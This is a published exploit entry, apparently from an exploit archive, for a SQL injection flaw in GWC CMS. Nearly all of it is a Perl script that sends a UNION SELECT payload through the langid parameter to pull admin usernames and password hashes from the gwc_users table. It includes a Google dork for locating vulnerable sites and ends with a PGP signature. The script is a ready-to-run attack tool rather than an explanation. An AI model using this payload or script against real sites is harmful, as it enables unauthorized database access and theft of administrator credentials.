# Exploit Title: GWC CMS SQL Injection Vulnerability
# Exploit Author: nopesled
# Google Dork: "inurl:?langid=1 inurl:topmenuid="
# Date: 08/07/2015
# Version: 1.0
# Tested on: Linux
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(GET);
print " == Exploit by nopesled == \n";
if (@ARGV < 1){
die "Invalid amount of arguments\nExample: perl $0 http://site.com\n";
}
$site = shift;
$ua = LWP::UserAgent->new;
$payload = "$site/?langid=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,group_concat(0x3c62723e,userlogin,0x3a,userpasswd) from gwc_users--";
print "[+] Grabbing Admin login [+]\n";
$request = GET $payload;
$response = $ua->request($request);
if ($response->is_success){
if ($response->content =~ /(.+[0-9a-f]{32})/){
print "[+] Admin info obtained [+]\n\n$1\n";
exit;
}
else {
die "[+] Admin info not found [+]";
}
}
else {
die "[+] Request failed [+]";
}
exit;
=pod
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Signed.
-----BEGIN PGP SIGNATURE-----
Version: Keybase OpenPGP v2.0.20
Comment: https://keybase.io/crypto
wsBcBAABCgAGBQJVnUB5AAoJEOB0UMODnV4UWD0IAIPzPvMFsJOGhlv1HF1Nb1Xg
g9fWZ8FWBV0/+hUuEBQX0TmcEgugssdG+ce4qhYthnqgKa9PgM/oViDUn4eEK32c
/yyOgQ+uY4wMIZaV4LykLx3i9Dwh1kF+MuphLwHhPmuZMBu2sQNELJjdTtWJ6+cW
Ue9g1eF1Af+Hn2LY+LBSwb9XbLYSqFkUAYSon/NCQgC7YWA+t7+B434zkgXBwZDe
/ppTysv6nSI0EVap0u4dh7qafztQsFK2DF2f/cnU6JtYpOPvgbuoa/kHQ9yAVAr6
6LbNVN3uKXUd63ZlJvRAHao7mvrVzIojzstRiX8oOHl0u99NMHJukUEX7UhWXAM=
=TMgD
-----END PGP SIGNATURE-----
=cut